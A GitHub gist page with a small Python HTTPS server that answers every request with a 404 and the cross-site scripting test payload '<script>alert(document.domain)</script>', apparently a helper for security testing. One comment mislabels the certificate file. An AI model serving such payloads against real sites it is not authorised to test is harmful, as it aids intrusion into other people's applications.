Skip to content

Instantly share code, notes, and snippets.

@stefanocoding
Forked from dergachev/simple-https-server.py
Last active May 6, 2021 12:47
Show Gist options
  • Save stefanocoding/0900ecc6eb5c299f04682ae23206e954 to your computer and use it in GitHub Desktop.
Save stefanocoding/0900ecc6eb5c299f04682ae23206e954 to your computer and use it in GitHub Desktop.
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.xml with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:443
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
class HttpHandler(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(404)
self.send_header(b'Content-type', 'text/html')
self.end_headers()
def do_GET(self):
self._set_headers()
self.wfile.write(b'<script>alert(document.domain)</script>')
def do_POST(self):
self._set_headers()
self.wfile.write(b'<script>alert(document.domain)</script>')
httpd = HTTPServer(('0.0.0.0', 443), HttpHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment